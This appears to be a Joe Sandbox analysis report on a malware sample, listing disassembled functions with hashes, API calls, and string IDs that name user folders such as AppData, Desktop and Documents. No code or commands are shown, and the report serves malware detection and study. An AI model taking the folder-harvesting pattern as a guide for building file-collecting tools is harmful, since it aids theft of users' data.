                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 31ef07464ef63a5c9c9cd39a0443a4b7d3b615bba5a9182160bf04083150539f
                                                                                                                                                                                                                                                                                • Instruction ID: 0d88d1c80d5cf604edfe207e3e975c6923d32c25b21c0e4bf53f94e4bddbbc5c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31ef07464ef63a5c9c9cd39a0443a4b7d3b615bba5a9182160bf04083150539f
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55E18DB1B06A56ABC30A9F79C4805E5F7A5FF4A309B04832EE86C53242D7347467CBC6
                                                                                                                                                                                                                                                                                Function 0041C450 Relevance: .3, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 8f64cdb3b1d29652fe465c7eda393228ef7c1b6854ad480e8303c0fc9060796f
                                                                                                                                                                                                                                                                                • Instruction ID: 4cfa1d93c302992564cd6e5d5855d4dbd855d3a9678cd46773ae9a1c723c4c6d
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f64cdb3b1d29652fe465c7eda393228ef7c1b6854ad480e8303c0fc9060796f
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3AD1F975A253118BDB02DFB8C8C05D577A6AF96341B08C37EEC487F20BE738A4428B56
                                                                                                                                                                                                                                                                                Function 0041CF70 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 0099ba6986021977b459ed1277b3cc7f57074f773dc9ab2e8ab287546e3aad9a
                                                                                                                                                                                                                                                                                • Instruction ID: eb1f8b5bbe8e890cce5985e8088739ae93b1079bd2bcff990eab828ac5c7b9b1
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0099ba6986021977b459ed1277b3cc7f57074f773dc9ab2e8ab287546e3aad9a
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A431C330D740B049C7809F39C8949E77BE2DB8B206FAD86A7D5D147583D319C64BEB25
                                                                                                                                                                                                                                                                                Function 00401170 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                                                • Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655
                                                                                                                                                                                                                                                                                Function 00401190 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                • Opcode ID: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                                                • Instruction ID: b23bb995dfb30c632528fdc81509a2daafe07b1b64e7ca450f6c4b88134f84f9
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51A00236161E83C6D7535614876630971A6AB41AD4F054A64584184A40DB6DC678E501
                                                                                                                                                                                                                                                                                Function 0040D250 Relevance: 77.0, APIs: 51, Instructions: 450memorystringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: lstrlenA.KERNEL32(?), ref: 0040D09D
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: strchr.MSVCRT ref: 0040D0B6
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: strchr.MSVCRT ref: 0040D0CE
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: lstrlenA.KERNEL32(?), ref: 0040D0EA
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: GetProcessHeap.KERNEL32 ref: 0040D0FB
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: HeapAlloc.KERNEL32(00000000,00000008,-00000001), ref: 0040D105
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: strlen.MSVCRT ref: 0040D130
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040D080: strcpy_s.MSVCRT ref: 0040D184
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040D2BA
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 0040D2C4
                                                                                                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D2D6
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D2E2
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D2EC
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D318
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D322
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D332
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D33C
                                                                                                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D34E
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D35A
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D364
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D385
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D38F
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D39F
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D3A9
                                                                                                                                                                                                                                                                                • strcpy_s.MSVCRT ref: 0040D3B7
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D3C3
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3CD
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D3E4
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3EE
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D40F
                                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D419
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 0040D429
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D433
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D7C4
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D811
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Heap$Process$Free$Alloc$strcpy_s$??3@lstrlenstrchr$strlen
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2961803143-0
                                                                                                                                                                                                                                                                                • Opcode ID: 72cdda64b41f2c5f2a1f08ffc243dcb9b35d119eec99e21d0205ef634b2de86d
                                                                                                                                                                                                                                                                                • Instruction ID: ca06d6565e22a4b8139dc5fe8ec41e059b536d5ea08dc7ed3398fadcca26eeb0
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72cdda64b41f2c5f2a1f08ffc243dcb9b35d119eec99e21d0205ef634b2de86d
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7F1D5B19043005BD710ABA5CD49B6FBBE9EF85714F04083EF986972D1D778AC48CB9A
                                                                                                                                                                                                                                                                                Function 00412E50 Relevance: 65.2, APIs: 26, Strings: 11, Instructions: 424stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00412E74
                                                                                                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00412EC4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                                                • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$false$true$|
                                                                                                                                                                                                                                                                                • API String ID: 348468850-2422389115
                                                                                                                                                                                                                                                                                • Opcode ID: a114e8b074fab81b471b136f835b17f48d344ad7e93d13b1cd96e526f6e09b3c
                                                                                                                                                                                                                                                                                • Instruction ID: af6f1e03352f6f9f1d8fae1c75086c49a28638e44c42a35a98b4b473fe3f47e4
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a114e8b074fab81b471b136f835b17f48d344ad7e93d13b1cd96e526f6e09b3c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1E1AF70204308AFD324AF25D895FABB3A9BB44344F04445EFD179B292DB7CE985CB69
                                                                                                                                                                                                                                                                                Function 00412F60 Relevance: 61.6, APIs: 24, Strings: 11, Instructions: 374stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • strtok_s.MSVCRT ref: 00412F88
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,00000104,?,00000104,?,?,00000000,?,?,00000000,?,?,00000000,00000000), ref: 00413081
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(?,00000000,?,%DESKTOP%,00000000,?,00000010,?,?,00000000,?,?,00000000,?,?,00000000), ref: 004130AE
